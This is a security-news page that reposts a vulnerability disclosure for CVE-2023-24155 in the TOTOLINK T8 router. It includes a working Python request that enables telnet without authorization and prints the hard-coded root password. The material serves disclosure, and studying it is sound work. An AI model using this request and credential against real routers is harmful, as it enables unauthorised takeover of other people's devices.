Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-24155: CVE-vulns/telnet_login.md at main · Double-q1015/CVE-vulns

TOTOLINK T8 V4.1.5cu was discovered to contain a hard code password for the telnet service which is stored in the component /web_cste/cgi-bin/product.ini.

CVE
Open in Source
#vulnerability#web#auth#telnet

Permalink

1 contributor

Users who have contributed to this file

TOTOLINK T8 TELNET****Description

Attackers can start the Telnet service without authorization and log in to the telnet service with a hard-coded password

Firmware information

  • Manufacturer’s address:https://www.totolink.net/

  • Firmware download address : https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip

Affected version

Version: V4.1.5cu

Vulnerability details

Telnet is enabled by sending the following POST packet .

import requests
url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"
data = '{"telnet_enabled":"1","topicurl":"setTelnetCfg"}'
rep = requests.post(url, data=data)
print(rep.status_code)
print(rep.content)

The default account password exists in the file /web_cste/cgi-bin/product.ini:root:KL@UHeZ0

In /bin/cs

In bin/convertIniToCfg

success!

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE